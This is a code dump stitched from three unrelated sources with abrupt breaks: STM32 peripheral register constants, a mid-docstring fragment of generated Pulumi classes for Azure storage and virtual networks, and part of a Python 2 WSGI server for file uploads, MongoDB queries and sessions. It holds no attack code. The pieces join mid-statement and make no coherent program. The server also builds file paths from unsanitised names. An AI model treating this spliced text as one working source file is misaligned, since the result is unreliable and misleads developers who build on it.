# --- EXTI (external interrupt controller) ---
EXTI = 1073822720  # type: int
EXTI_EMR = 4  # type: int
EXTI_FTSR = 12  # type: int
EXTI_IMR = 0  # type: int
EXTI_PR = 20  # type: int
EXTI_RTSR = 8  # type: int
EXTI_SWIER = 16  # type: int

# --- FLASH interface ---
FLASH = 1073888256  # type: int
FLASH_ACR = 0  # type: int
FLASH_CR = 16  # type: int
FLASH_KEYR = 4  # type: int
FLASH_OPTCR = 20  # type: int
FLASH_OPTCR1 = 24  # type: int
FLASH_OPTKEYR = 8  # type: int
FLASH_SR = 12  # type: int

# --- GPIO ports and register offsets ---
GPIOA = 1073872896  # type: int
GPIOB = 1073873920  # type: int
GPIOC = 1073874944  # type: int
GPIOD = 1073875968  # type: int
GPIOE = 1073876992  # type: int
GPIOF = 1073878016  # type: int
GPIOG = 1073879040  # type: int
GPIOH = 1073880064  # type: int
GPIOI = 1073881088  # type: int
GPIO_AFR0 = 32  # type: int
GPIO_AFR1 = 36  # type: int
GPIO_BSRR = 24  # type: int
GPIO_BSRRH = 26  # type: int
GPIO_BSRRL = 24  # type: int
GPIO_IDR = 16  # type: int
GPIO_LCKR = 28  # type: int
GPIO_MODER = 0  # type: int
GPIO_ODR = 20  # type: int
GPIO_OSPEEDR = 8  # type: int
GPIO_OTYPER = 4  # type: int
GPIO_PUPDR = 12  # type: int

# --- I2C / I2S ---
I2C1 = 1073763328  # type: int
I2C2 = 1073764352  # type: int
I2C3 = 1073765376  # type: int
I2C_CCR = 28  # type: int
I2C_CR1 = 0  # type: int
I2C_CR2 = 4  # type: int
I2C_DR = 16  # type: int
I2C_OAR1 = 8  # type: int
I2C_OAR2 = 12  # type: int
I2C_SR1 = 20  # type: int
I2C_SR2 = 24  # type: int
I2C_TRISE = 32  # type: int
I2S2EXT = 1073755136  # type: int
I2S3EXT = 1073758208  # type: int

# --- IWDG (independent watchdog) ---
IWDG = 1073754112  # type: int
IWDG_KR = 0  # type: int
IWDG_PR = 4  # type: int
IWDG_RLR = 8  # type: int
IWDG_SR = 12  # type: int

# --- PWR ---
PWR = 1073770496  # type: int
PWR_CR = 0  # type: int
PWR_CSR = 4  # type: int

# --- RCC (reset and clock control) ---
RCC = 1073887232  # type: int
RCC_AHB1ENR = 48  # type: int
RCC_AHB1LPENR = 80  # type: int
RCC_AHB1RSTR = 16  # type: int
RCC_AHB2ENR = 52  # type: int
RCC_AHB2LPENR = 84  # type: int
RCC_AHB2RSTR = 20  # type: int
RCC_AHB3ENR = 56  # type: int
RCC_AHB3LPENR = 88  # type: int
RCC_AHB3RSTR = 24  # type: int
RCC_APB1ENR = 64  # type: int
RCC_APB1LPENR = 96  # type: int
RCC_APB1RSTR = 32  # type: int
RCC_APB2ENR = 68  # type: int
RCC_APB2LPENR = 100  # type: int
RCC_APB2RSTR = 36  # type: int
RCC_BDCR = 112  # type: int
RCC_CFGR = 8  # type: int
RCC_CIR = 12  # type: int
RCC_CR = 0  # type: int
RCC_CSR = 116  # type: int
RCC_PLLCFGR = 4  # type: int
RCC_PLLI2SCFGR = 132  # type: int
RCC_SSCGR = 128  # type: int

# --- RNG ---
RNG = 1342572544  # type: int
RNG_CR = 0  # type: int
RNG_DR = 8  # type: int
RNG_SR = 4  # type: int

# --- RTC (incl. backup registers) ---
RTC = 1073752064  # type: int
RTC_ALRMAR = 28  # type: int
RTC_ALRMASSR = 68  # type: int
RTC_ALRMBR = 32  # type: int
RTC_ALRMBSSR = 72  # type: int
RTC_BKP0R = 80  # type: int
RTC_BKP10R = 120  # type: int
RTC_BKP11R = 124  # type: int
RTC_BKP12R = 128  # type: int
RTC_BKP13R = 132  # type: int
RTC_BKP14R = 136  # type: int
RTC_BKP15R = 140  # type: int
RTC_BKP16R = 144  # type: int
RTC_BKP17R = 148  # type: int
RTC_BKP18R = 152  # type: int
RTC_BKP19R = 156  # type: int
RTC_BKP1R = 84  # type: int
RTC_BKP2R = 88  # type: int
RTC_BKP3R = 92  # type: int
RTC_BKP4R = 96  # type: int
RTC_BKP5R = 100  # type: int
RTC_BKP6R = 104  # type: int
RTC_BKP7R = 108  # type: int
RTC_BKP8R = 112  # type: int
RTC_BKP9R = 116  # type: int
RTC_CALIBR = 24  # type: int
RTC_CALR = 60  # type: int
RTC_CR = 8  # type: int
RTC_DR = 4  # type: int
RTC_ISR = 12  # type: int
RTC_PRER = 16  # type: int
RTC_SHIFTR = 44  # type: int
RTC_SSR = 40  # type: int
RTC_TAFCR = 64  # type: int
RTC_TR = 0  # type: int
RTC_TSDR = 52  # type: int
RTC_TSSSR = 56  # type: int
RTC_TSTR = 48  # type: int
RTC_WPR = 36  # type: int
RTC_WUTR = 20  # type: int

# --- SDIO / SPI ---
SDIO = 1073818624  # type: int
SPI1 = 1073819648  # type: int
SPI2 = 1073756160  # type: int
SPI3 = 1073757184  # type: int
SPI_CR1 = 0  # type: int
SPI_CR2 = 4  # type: int
SPI_CRCPR = 16  # type: int
SPI_DR = 12  # type: int
SPI_I2SCFGR = 28  # type: int
SPI_I2SPR = 32  # type: int
SPI_RXCRCR = 20  # type: int
SPI_SR = 8  # type: int
SPI_TXCRCR = 24  # type: int

# --- SYSCFG ---
SYSCFG = 1073821696  # type: int
SYSCFG_CMPCR = 32  # type: int
SYSCFG_EXTICR0 = 8  # type: int
SYSCFG_EXTICR1 = 12  # type: int
SYSCFG_EXTICR2 = 16  # type: int
SYSCFG_EXTICR3 = 20  # type: int
SYSCFG_MEMRMP = 0  # type: int
SYSCFG_PMC = 4  # type: int

# --- Timers ---
TIM1 = 1073807360  # type: int
TIM10 = 1073824768  # type: int
TIM11 = 1073825792  # type: int
TIM12 = 1073747968  # type: int
TIM13 = 1073748992  # type: int
TIM14 = 1073750016  # type: int
TIM2 = 1073741824  # type: int
TIM3 = 1073742848  # type: int
TIM4 = 1073743872  # type: int
TIM5 = 1073744896  # type: int
TIM6 = 1073745920  # type: int
TIM7 = 1073746944  # type: int
TIM8 = 1073808384  # type: int
TIM9 = 1073823744  # type: int
TIM_ARR = 44  # type: int
TIM_BDTR = 68  # type: int
TIM_CCER = 32  # type: int
TIM_CCMR1 = 24  # type: int
TIM_CCMR2 = 28  # type: int
TIM_CCR1 = 52  # type: int
TIM_CCR2 = 56  # type: int
TIM_CCR3 = 60  # type: int
TIM_CCR4 = 64  # type: int
TIM_CNT = 36  # type: int
TIM_CR1 = 0  # type: int
TIM_CR2 = 4  # type: int
TIM_DCR = 72  # type: int
TIM_DIER = 12  # type: int
TIM_DMAR = 76  # type: int
TIM_EGR = 20  # type: int
TIM_OR = 80  # type: int
TIM_PSC = 40  # type: int
TIM_RCR = 48  # type: int
TIM_SMCR = 8  # type: int
TIM_SR = 16  # type: int

# --- UART / USART (register list truncated at this point in the paste) ---
UART4 = 1073761280  # type: int
UART5 = 1073762304  # type: int
USART1 = 1073811456  # type: int
USART2 = 1073759232  # type: int
USART3 = 1073760256  # type: int
USART6 = 1073812480  # type: int
USART_BRR = 8  # type: int
USART_CR1 = 12  # type: int
USART_CR2 = 16  # type: int
USART_CR3 = 20  # type: int
- Specifies the default action of allow or deny when no other rules match. Possible values include: 'DefaultActionAllow', 'DefaultActionDeny' """ return pulumi.get(self, "default_action") @default_action.setter def default_action(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "default_action", value) @property @pulumi.getter(name="ipRules") def ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleIpRulesArgs']]]]: """ IPRules - Sets the IP ACL rules """ return pulumi.get(self, "ip_rules") @ip_rules.setter def ip_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleIpRulesArgs']]]]): pulumi.set(self, "ip_rules", value) @property @pulumi.getter(name="virtualNetworkRules") def virtual_network_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleVirtualNetworkRulesArgs']]]]: """ VirtualNetworkRules - Sets the virtual network rules """ return pulumi.get(self, "virtual_network_rules") @virtual_network_rules.setter def virtual_network_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleVirtualNetworkRulesArgs']]]]): pulumi.set(self, "virtual_network_rules", value) @pulumi.input_type class StorageAccountSpecNetworkRuleIpRulesArgs: def __init__(__self__, *, ip_address_or_range: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] ip_address_or_range: IPAddressOrRange - Specifies the IP or IP range in CIDR format. Only IPV4 address is allowed. """ if ip_address_or_range is not None: pulumi.set(__self__, "ip_address_or_range", ip_address_or_range) @property @pulumi.getter(name="ipAddressOrRange") def ip_address_or_range(self) -> Optional[pulumi.Input[str]]: """ IPAddressOrRange - Specifies the IP or IP range in CIDR format. Only IPV4 address is allowed. 
""" return pulumi.get(self, "ip_address_or_range") @ip_address_or_range.setter def ip_address_or_range(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "ip_address_or_range", value) @pulumi.input_type class StorageAccountSpecNetworkRuleVirtualNetworkRulesArgs: def __init__(__self__, *, subnet_id: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] subnet_id: SubnetId - Resource ID of a subnet, for example: /subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.Network/virtualNetworks/{vnetName}/subnets/{subnetName}. """ if subnet_id is not None: pulumi.set(__self__, "subnet_id", subnet_id) @property @pulumi.getter(name="subnetId") def subnet_id(self) -> Optional[pulumi.Input[str]]: """ SubnetId - Resource ID of a subnet, for example: /subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.Network/virtualNetworks/{vnetName}/subnets/{subnetName}. """ return pulumi.get(self, "subnet_id") @subnet_id.setter def subnet_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "subnet_id", value) @pulumi.input_type class StorageAccountSpecSkuArgs: def __init__(__self__, *, name: Optional[pulumi.Input[str]] = None): """ StorageAccountSku the SKU of the storage account. :param pulumi.Input[str] name: Name - The SKU name. Required for account creation; optional for update. Possible values include: 'StandardLRS', 'StandardGRS', 'StandardRAGRS', 'StandardZRS', 'PremiumLRS', 'PremiumZRS', 'StandardGZRS', 'StandardRAGZRS' """ if name is not None: pulumi.set(__self__, "name", name) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ Name - The SKU name. Required for account creation; optional for update. 
Possible values include: 'StandardLRS', 'StandardGRS', 'StandardRAGRS', 'StandardZRS', 'PremiumLRS', 'PremiumZRS', 'StandardGZRS', 'StandardRAGZRS' """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @pulumi.input_type class StorageAccountStatusArgs: def __init__(__self__, *, completed: Optional[pulumi.Input[str]] = None, contains_update: Optional[pulumi.Input[bool]] = None, failed_provisioning: Optional[pulumi.Input[bool]] = None, flattened_secrets: Optional[pulumi.Input[bool]] = None, message: Optional[pulumi.Input[str]] = None, output: Optional[pulumi.Input[str]] = None, polling_url: Optional[pulumi.Input[str]] = None, provisioned: Optional[pulumi.Input[bool]] = None, provisioning: Optional[pulumi.Input[bool]] = None, requested: Optional[pulumi.Input[str]] = None, resource_id: Optional[pulumi.Input[str]] = None, spec_hash: Optional[pulumi.Input[str]] = None, state: Optional[pulumi.Input[str]] = None): """ ASOStatus (AzureServiceOperatorsStatus) defines the observed state of resource actions """ if completed is not None: pulumi.set(__self__, "completed", completed) if contains_update is not None: pulumi.set(__self__, "contains_update", contains_update) if failed_provisioning is not None: pulumi.set(__self__, "failed_provisioning", failed_provisioning) if flattened_secrets is not None: pulumi.set(__self__, "flattened_secrets", flattened_secrets) if message is not None: pulumi.set(__self__, "message", message) if output is not None: pulumi.set(__self__, "output", output) if polling_url is not None: pulumi.set(__self__, "polling_url", polling_url) if provisioned is not None: pulumi.set(__self__, "provisioned", provisioned) if provisioning is not None: pulumi.set(__self__, "provisioning", provisioning) if requested is not None: pulumi.set(__self__, "requested", requested) if resource_id is not None: pulumi.set(__self__, "resource_id", resource_id) if spec_hash is not None: 
pulumi.set(__self__, "spec_hash", spec_hash) if state is not None: pulumi.set(__self__, "state", state) @property @pulumi.getter def completed(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "completed") @completed.setter def completed(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "completed", value) @property @pulumi.getter(name="containsUpdate") def contains_update(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "contains_update") @contains_update.setter def contains_update(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "contains_update", value) @property @pulumi.getter(name="failedProvisioning") def failed_provisioning(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "failed_provisioning") @failed_provisioning.setter def failed_provisioning(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "failed_provisioning", value) @property @pulumi.getter(name="flattenedSecrets") def flattened_secrets(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "flattened_secrets") @flattened_secrets.setter def flattened_secrets(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "flattened_secrets", value) @property @pulumi.getter def message(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "message") @message.setter def message(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "message", value) @property @pulumi.getter def output(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "output") @output.setter def output(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "output", value) @property @pulumi.getter(name="pollingUrl") def polling_url(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "polling_url") @polling_url.setter def polling_url(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "polling_url", value) @property @pulumi.getter def provisioned(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, 
"provisioned") @provisioned.setter def provisioned(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "provisioned", value) @property @pulumi.getter def provisioning(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "provisioning") @provisioning.setter def provisioning(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "provisioning", value) @property @pulumi.getter def requested(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "requested") @requested.setter def requested(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "requested", value) @property @pulumi.getter(name="resourceId") def resource_id(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "resource_id") @resource_id.setter def resource_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "resource_id", value) @property @pulumi.getter(name="specHash") def spec_hash(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "spec_hash") @spec_hash.setter def spec_hash(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "spec_hash", value) @property @pulumi.getter def state(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "state") @state.setter def state(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "state", value) @pulumi.input_type class VirtualNetworkSpecArgs: def __init__(__self__, *, address_space: pulumi.Input[str], location: pulumi.Input[str], resource_group: pulumi.Input[str], subnets: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkSpecSubnetsArgs']]]] = None): """ VirtualNetworkSpec defines the desired state of VirtualNetwork :param pulumi.Input[str] location: INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "make" to regenerate code after modifying this file """ pulumi.set(__self__, "address_space", address_space) pulumi.set(__self__, "location", location) pulumi.set(__self__, "resource_group", resource_group) if subnets is not None: 
pulumi.set(__self__, "subnets", subnets) @property @pulumi.getter(name="addressSpace") def address_space(self) -> pulumi.Input[str]: return pulumi.get(self, "address_space") @address_space.setter def address_space(self, value: pulumi.Input[str]): pulumi.set(self, "address_space", value) @property @pulumi.getter def location(self) -> pulumi.Input[str]: """ INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "make" to regenerate code after modifying this file """ return pulumi.get(self, "location") @location.setter def location(self, value: pulumi.Input[str]): pulumi.set(self, "location", value) @property @pulumi.getter(name="resourceGroup") def resource_group(self) -> pulumi.Input[str]: return pulumi.get(self, "resource_group") @resource_group.setter def resource_group(self, value: pulumi.Input[str]): pulumi.set(self, "resource_group", value) @property @pulumi.getter def subnets(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkSpecSubnetsArgs']]]]: return pulumi.get(self, "subnets") @subnets.setter def subnets(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkSpecSubnetsArgs']]]]): pulumi.set(self, "subnets", value) @pulumi.input_type class VirtualNetworkSpecSubnetsArgs: def __init__(__self__, *, subnet_address_prefix: pulumi.Input[str], subnet_name: pulumi.Input[str], service_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None): """ VNetSubnets defines subnets for this vnet :param pulumi.Input[str] subnet_name: INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "make" to regenerate code after modifying this file """ pulumi.set(__self__, "subnet_address_prefix", subnet_address_prefix) pulumi.set(__self__, "subnet_name", subnet_name) if service_endpoints is not None: pulumi.set(__self__, "service_endpoints", service_endpoints) @property @pulumi.getter(name="subnetAddressPrefix") def subnet_address_prefix(self) -> pulumi.Input[str]: return pulumi.get(self, 
"subnet_address_prefix") @subnet_address_prefix.setter def subnet_address_prefix(self, value: pulumi.Input[str]): pulumi.set(self, "subnet_address_prefix", value) @property @pulumi.getter(name="subnetName") def subnet_name(self) -> pulumi.Input[str]: """ INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "make" to regenerate code after modifying this file """ return pulumi.get(self, "subnet_name") @subnet_name.setter def subnet_name(self, value: pulumi.Input[str]): pulumi.set(self, "subnet_name", value) @property @pulumi.getter(name="serviceEndpoints") def service_endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: return pulumi.get(self, "service_endpoints") @service_endpoints.setter def service_endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "service_endpoints", value) @pulumi.input_type class VirtualNetworkStatusArgs: def __init__(__self__, *, completed: Optional[pulumi.Input[str]] = None, contains_update: Optional[pulumi.Input[bool]] = None, failed_provisioning: Optional[pulumi.Input[bool]] = None, flattened_secrets: Optional[pulumi.Input[bool]] = None, message: Optional[pulumi.Input[str]] = None, output: Optional[pulumi.Input[str]] = None, polling_url: Optional[pulumi.Input[str]] = None, provisioned: Optional[pulumi.Input[bool]] = None, provisioning: Optional[pulumi.Input[bool]] = None, requested: Optional[pulumi.Input[str]] = None, resource_id: Optional[pulumi.Input[str]] = None, spec_hash: Optional[pulumi.Input[str]] = None, state: Optional[pulumi.Input[str]] = None): """ ASOStatus (AzureServiceOperatorsStatus) defines the observed state of resource actions """ if completed is not None: pulumi.set(__self__, "completed", completed) if contains_update is not None: pulumi.set(__self__, "contains_update", contains_update) if failed_provisioning is not None: pulumi.set(__self__, "failed_provisioning", failed_provisioning) if flattened_secrets is not None: 
pulumi.set(__self__, "flattened_secrets", flattened_secrets) if message is not None: pulumi.set(__self__, "message", message) if output is not None: pulumi.set(__self__, "output", output) if polling_url is not None: pulumi.set(__self__, "polling_url", polling_url) if provisioned is not None: pulumi.set(__self__, "provisioned", provisioned) if provisioning is not None: pulumi.set(__self__, "provisioning", provisioning) if requested is not None: pulumi.set(__self__, "requested", requested) if resource_id is not None: pulumi.set(__self__, "resource_id", resource_id) if spec_hash is not None: pulumi.set(__self__, "spec_hash", spec_hash) if state is not None: pulumi.set(__self__, "state", state) @property @pulumi.getter def completed(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "completed") @completed.setter def completed(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "completed", value) @property @pulumi.getter(name="containsUpdate") def contains_update(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "contains_update") @contains_update.setter def contains_update(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "contains_update", value) @property @pulumi.getter(name="failedProvisioning") def failed_provisioning(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "failed_provisioning") @failed_provisioning.setter def failed_provisioning(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "failed_provisioning", value) @property @pulumi.getter(name="flattenedSecrets") def flattened_secrets(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "flattened_secrets") @flattened_secrets.setter def flattened_secrets(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "flattened_secrets", value) @property @pulumi.getter def message(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "message") @message.setter def message(self, value: Optional[pulumi.Input[str]]): 
pulumi.set(self, "message", value) @property @pulumi.getter def output(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "output") @output.setter def output(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "output", value) @property @pulumi.getter(name="pollingUrl") def polling_url(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "polling_url") @polling_url.setter def polling_url(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "polling_url", value) @property @pulumi.getter def provisioned(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "provisioned")
os.path.exists(p): os.mkdir(p) return p def create_voice_dir(): global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR if not os.path.exists(UPLOAD_VOICE_DIR): os.mkdir(UPLOAD_VOICE_DIR) def check_voice_file_by_fault(id): global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR create_voice_dir() ret = False for fn in os.listdir(UPLOAD_VOICE_DIR): if id in fn: ret = True break return ret def get_voice_file_latest(id): global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR create_voice_dir() l = [] for fn in os.listdir(UPLOAD_VOICE_DIR): if id in fn: l.append(fn) ret = None if len(l)>0: l.sort() ret = l[-1] return ret def get_voice_file_by(id): global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR create_voice_dir() l = [] for fn in os.listdir(UPLOAD_VOICE_DIR): if id in fn: l.append(fn) return l def get_voice_file_all(): global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR s = set() for fn in os.listdir(UPLOAD_VOICE_DIR): p = os.path.join(UPLOAD_VOICE_DIR, fn) if os.path.isfile(p): arr = fn.split('@') if len(arr)==3: id = arr[1] s.add(id) return list(s) def create_pic_dir(): global STATICRESOURCE_DIR, UPLOAD_PHOTOS_DIR if not os.path.exists(os.path.join(STATICRESOURCE_DIR,'photos')): os.mkdir(os.path.join(STATICRESOURCE_DIR,'photos')) if not os.path.exists(UPLOAD_PHOTOS_DIR): os.mkdir(UPLOAD_PHOTOS_DIR) def handle_upload_file(querydict, buf): global STATICRESOURCE_DIR, UPLOAD_PHOTOS_DIR, UPLOAD_VOICE_DIR ret = False # root = os.path.abspath(STATICRESOURCE_DIR) try: if querydict.has_key('db'): db_util.gridfs_save(querydict, querydict['filename'], buf) ret = True except Exception,e: raise return ret def import_xls(path, fileobj, area, line_name, voltage, category): with open(path, 'wb') as f: f.write(fileobj) return db_util.import_tower_xls_file(area, line_name, voltage, category, path) def save_file_to(category, dir_id, filename, fileobj): root = os.path.abspath(category) if not os.path.exists(root): os.mkdir(root) p = os.path.join(root, filename) if dir_id: p = os.path.join(root, dir_id) if not os.path.exists(p): 
os.mkdir(p) p = os.path.join(root, dir_id, filename) with open(p, 'wb') as f: f1 = gevent.fileobject.FileObjectThread(f, 'wb') f1.write(fileobj) def geojson_to_czml(aList): cz = czml.CZML() for i in aList: if i.has_key('properties') and i['properties'].has_key('id'): packet = czml.CZMLPacket(id=i['properties']['id']) #tower if i['properties'].has_key('tower_code'): packet = czml.CZMLPacket(id=i['properties']['id'], name=i['properties']['tower_name']) packet.position = czml.Position(cartographicDegrees = [i['geometry']['coordinates'][0], i['geometry']['coordinates'][1], i['geometry']['coordinates'][2],]) packet.point = czml.Point(show=True, color={'rgba': [255, 255, 0, 255]}, pixelSize=10, outlineColor={'rgba': [0, 0, 0, 255]}, outlineWidth=1) #packet.label = czml.Label(text=i['properties']['tower_name'], show=True, scale=0.5) packet.description = i['properties']['tower_name'] #packet.billboard = czml.Billboard(image='http://localhost:88/img/tower.png') cz.append(packet) return cz def handle_post_method(environ): global ENCODING global gRequest querydict, buf = get_querydict_by_GET_POST(environ) ret = {} is_upload = False is_mongo = False use_czml = False get_extext = False headers = {} headers['Content-Type'] = 'text/json;charset=' + ENCODING if buf is not None: try: is_upload = handle_upload_file(querydict, buf) except: pass if querydict.has_key('db') and querydict.has_key('collection'): is_mongo = True dbname = querydict['db'] collection = querydict['collection'] action = None data = None if querydict.has_key('action'): action = querydict['action'] del querydict['action'] if querydict.has_key('data'): data = querydict['data'] del querydict['data'] if querydict.has_key('use_czml') and querydict['use_czml']: use_czml = True del querydict['use_czml'] if querydict.has_key('get_extext') and querydict['get_extext']: get_extext = True del querydict['get_extext'] del querydict['db'] del querydict['collection'] if action: if 'markdown_' in action or u'markdown_' in 
action: l = db_util.mongo_action(dbname, collection, action, data, querydict, 'markdown') else: l = db_util.mongo_action(dbname, collection, action, data, querydict) else: l = db_util.mongo_find(dbname, collection, querydict) if get_extext: l = db_util.find_extent(l) if use_czml: l = geojson_to_czml(l) if isinstance(l, list) and len(l) >= 0: ret = l elif isinstance(l, dict) and len(l.keys()) > 0: ret = l elif isinstance(l, czml.CZML): headers['Content-Type'] = 'text/json;charset=' + ENCODING return '200 OK', headers, enc(l.dumps()) #else: #ret["result"] = "%s.%s return 0 record" % (dbname, collection) #else: #ret["result"] = "unknown query operation" if not is_mongo: if querydict.has_key('thunder_counter'): try: ret = handle_thunder_soap(querydict) except: e = sys.exc_info()[1] if hasattr(e, 'message'): ret['result'] = e.message else: ret['result'] = str(e) elif querydict.has_key('op'): if querydict.has_key('area') and querydict['area'] and len(querydict['area'])>0: if querydict['op'] in ['save','delete','update']: ret = db_util.odbc_save_data_to_table(querydict['table'], querydict['op'], querydict['data'], querydict['line_id'], querydict['start_tower_id'], querydict['end_tower_id'], querydict['area']) else: ret = handle_requset_sync(querydict) elif querydict['op'] in ['alt','height'] : if querydict.has_key('lng') and querydict.has_key('lat') and isinstance(querydict['lng'], float) and isinstance(querydict['lat'], float): ret = db_util.extract_one_altitude(querydict['lng'], querydict['lat']) if querydict.has_key('data') and isinstance(querydict['data'], list): ret = db_util.extract_many_altitudes(querydict['data']) else: ret["result"] = "unknown area" elif querydict.has_key('tracks') and querydict.has_key('area'): ret = db_util.save_tracks(querydict['tracks'], querydict['area']) elif querydict.has_key('mobile_action') and querydict.has_key('area') and querydict.has_key('data'): ret = db_util.mobile_action(querydict['mobile_action'], querydict['area'], 
                                         querydict['data'])
    # Normalize 'ret' into something json.dumps can serialize before responding.
    if isinstance(ret, list):
        pass
    elif isinstance(ret, str) or isinstance(ret, unicode) or isinstance(ret, int) or isinstance(ret, float):
        pass
    elif isinstance(ret, dict):
        if len(ret.keys())==0:
            pass
        elif ret.has_key('result'):
            # An Exception stored under 'result' is flattened to its message text.
            if isinstance(ret['result'], exceptions.Exception):
                if hasattr(ret['result'], 'message'):
                    ret['result'] = ret['result'].message
                else:
                    ret['result'] = str(ret['result'])
            elif isinstance(ret['result'], str) or isinstance(ret['result'], unicode) or isinstance(ret['result'], int) or isinstance(ret['result'], float):
                pass
            elif isinstance(ret['result'], list) or isinstance(ret['result'], dict):
                pass
            else:
                ret["result"] = "unknown operation"
    else:
        ret["result"] = "unknown operation"
    #time.sleep(6)
    #print(ret)
    # NOTE(review): assumes 'headers' was populated earlier in this handler
    # (its head is outside this view) — confirm against the full function.
    return '200 OK', headers, json.dumps(ret, ensure_ascii=True, indent=4)

# def handle_login(environ):
#     global ENCODING
#     global gRequest
#     buf = environ['wsgi.input'].read()
#     ret = None
#     try:
#         ds_plus = urllib.unquote_plus(buf)
#         obj = json.loads(dec(ds_plus))
#         if obj.has_key(u'db') and obj.has_key(u'collection'):
#             is_mongo = True
#             dbname = obj[u'db']
#             collection = obj[u'collection']
#             action = None
#             data = None
#             if obj.has_key(u'action'):
#                 action = obj[u'action']
#                 del obj[u'action']
#             if obj.has_key(u'data'):
#                 data = obj[u'data']
#                 del obj[u'data']
#             if obj.has_key(u'url'):
#                 del obj[u'url']
#             if obj.has_key(u'redirect'):
#                 del obj[u'redirect']
#             del obj[u'db']
#             del obj[u'collection']
#             if action:
#                 ret = db_util.mongo_action(dbname, collection, action, data, obj)
#     except:
#         raise
#     return ret

def handle_thunder_soap(obj):
    """Dispatch a lightning-counter SOAP query.

    Routes on obj['thunder_counter'] to the matching soap_* helper and
    returns its result (empty dict when the operation name matches neither).
    """
    ret = {}
    if obj['thunder_counter'] == 'GetFlashofDate':
        ret = soap_GetFlashofDate(obj['start_time'], obj['end_time'])
    if obj['thunder_counter'] == 'GetFlashofEnvelope':
        ret = soap_GetFlashofEnvelope(obj['start_time'], obj['end_time'], obj['lng1'], obj['lng2'], obj['lat1'], obj['lat2'])
    return ret

def dishen_ws_loop(aWebSocket, aHash):
    """Push '<hash>\\n<millis>' to the websocket once per second until it closes."""
    while 1:
        #now = time.strftime('%Y-%m-%d %H:%M:%S')[:10]
        #ws.send("%d,%f\n" % ((time.time() - time.timezone)*1000, random.random()*10))
        #t = (time.time() - time.timezone) * 1000
        t = time.time() * 1000
        if aWebSocket:
            #message = aWebSocket.receive()
            #print("message=%s" % message)
            aWebSocket.send( '%s\n%d' % (str(aHash),int(t)) )
        else:
            # Socket gone; stop the push loop.
            break
        gevent.sleep(1.0)

def check_session(environ, request, session_store):
    """Attach a session to the request, creating one if the cookie is missing/stale.

    Returns (session, Set-Cookie header tuple, is_expire) where is_expire is
    True when a fresh session had to be created.
    """
    global gConfig

    def set_cookie(key, value):
        # Build a ('Set-Cookie', ...) header; cookie is marked secure iff SSL
        # is enabled in the listener config.
        secure = False
        if gConfig['listen_port']['enable_ssl'].lower() == 'true':
